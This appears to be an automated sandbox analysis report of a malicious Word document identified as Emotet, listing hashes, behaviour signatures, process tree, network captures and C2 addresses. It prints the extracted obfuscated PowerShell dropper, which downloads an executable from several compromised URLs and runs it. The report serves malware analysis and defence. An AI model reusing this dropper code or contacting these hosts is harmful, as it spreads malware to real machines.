Analysis

  • max time kernel
    58s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 20:24

General

  • Target

    a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc

  • Size

    190KB

  • MD5

    c3d62c1dccfaacec14d62bbe29629d0a

  • SHA1

    c13a5804da6c7bbd550d135da5026077a218ccb6

  • SHA256

    a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb

  • SHA512

    e63e53199dabc0a7c6ce1fbc8838a2d72110498ea1c94bf78655d2bb02722627fe769389783f8066bafc775e82166d0662e73c18c1ae1d8097180affa0918086

Malware Config

Extracted

Language
ps1
Source
$thib='heej';[Net.ServicePointManager]::"SEc`Ur`ITY`prOtOcOl" = 'tls12, tls11, tls';$ceudjuj = '997';$quuuvjoelbeakzeopguvnoad='moequveothpaurjeec';$nib=$env:userprofile+'\'+$ceudjuj+'.exe';$rieyfoeyhoucfoem='yuawmeoldoizdaj';$choulloehcualneavwiozfeuk=.('n'+'ew-obj'+'ect') nEt.wEbclIENt;$choichyichpaucchoafvaiv='http://mican.tri-comma.com/wp-admin/BmKOeycm0704/*http://defensacovid.com/wp-admin/dGzIMVvo/*http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/*http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/*http://karir-up.com/wp-admin/CCzj96yk23/'."S`plIT"([char]42);$maib='douychuasleov';foreach($raobzeux in $choichyichpaucchoafvaiv){try{$choulloehcualneavwiozfeuk."DOWn`lOA`Df`iLe"($raobzeux, $nib);$thoaktaehzertoxduaxweox='veaquthiacthiewthaukthoonhir';If ((.('Get'+'-Ite'+'m') $nib)."lE`NG`Th" -ge 30709) {([wmiclass]'win32_Process')."cRe`ATE"($nib);$yejkiomkauyzoh='tieb';break;$thoowrautdug='houtwiof'}}catch{}}$quoimcaonjoadyiavjoahzuul='yuunmof'
URLs
exe.dropper

http://mican.tri-comma.com/wp-admin/BmKOeycm0704/

exe.dropper

http://defensacovid.com/wp-admin/dGzIMVvo/

exe.dropper

http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/

exe.dropper

http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/

exe.dropper

http://karir-up.com/wp-admin/CCzj96yk23/

Extracted

Family

emotet

C2


rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies registry class 280 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1496
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e <encoded command elided>
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:1784
  • C:\Users\Admin\997.exe
    C:\Users\Admin\997.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1392
    • C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe
      "C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:1932

Network

  • DNS
    mican.tri-comma.com
    Remote address:
    8.8.8.8:53
    Request
    mican.tri-comma.com
    IN A
    Response
    mican.tri-comma.com
    IN A
    34.209.178.218
  • GET
    http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
    powersheLL.exe
    Remote address:
    34.209.178.218:80
    Request
    GET /wp-admin/BmKOeycm0704/ HTTP/1.1
    Host: mican.tri-comma.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.16.1
    Date: Fri, 17 Jul 2020 20:24:42 GMT
    Content-Type: application/x-dosexec
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.2.29
    Set-Cookie: 5f12090a14356=1595017482; expires=Fri, 17-Jul-2020 20:25:42 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Fri, 17 Jul 2020 20:24:42 GMT
    Expires: Fri, 17 Jul 2020 20:24:42 GMT
    Content-Disposition: attachment; filename="n7p39jhzm41784.exe"
    Content-Transfer-Encoding: binary
  • POST
    http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    perfts.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/ HTTP/1.1
    Referer: http://177.144.130.105/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    Content-Type: multipart/form-data; boundary=---------------------------051498590750595
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 177.144.130.105:443
    Content-Length: 4404
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST
    http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    perfts.exe
    Remote address:
    198.27.69.201:8080
    Request
    POST /jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/ HTTP/1.1
    Referer: http://198.27.69.201/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    Content-Type: multipart/form-data; boundary=---------------------------306077884771751
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 198.27.69.201:8080
    Content-Length: 4420
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 20:25:22 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 34.209.178.218:80
    http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
    http
    powersheLL.exe
    4.8kB
    291.4kB
    103
    197

    HTTP Request

    GET http://mican.tri-comma.com/wp-admin/BmKOeycm0704/

    HTTP Response

    200
  • 177.144.130.105:443
    http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    http
    perfts.exe
    5.4kB
    212 B
    9
    5

    HTTP Request

    POST http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
  • 198.27.69.201:8080
    http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    http
    perfts.exe
    5.4kB
    580 B
    9
    7

    HTTP Request

    POST http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/

    HTTP Response

    200
  • 10.7.0.255:138
    netbios-dgm
    1.1kB
    5
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 8.8.8.8:53
    mican.tri-comma.com
    dns
    65 B
    81 B
    1
    1

    DNS Request

    mican.tri-comma.com

    DNS Response

    34.209.178.218

  • 224.0.0.252:5355
    100 B
    2

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1392-11-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/1496-2-0x0000000008920000-0x0000000008924000-memory.dmp

    Filesize

    16KB

  • memory/1496-5-0x000000000AB90000-0x000000000AB94000-memory.dmp

    Filesize

    16KB

  • memory/1496-6-0x000000000BC10000-0x000000000BC14000-memory.dmp

    Filesize

    16KB

  • memory/1496-7-0x0000000006DA0000-0x0000000006FA0000-memory.dmp

    Filesize

    2.0MB

  • memory/1496-8-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1932-15-0x0000000000400000-0x0000000000448000-memory.dmp

    Filesize

    288KB
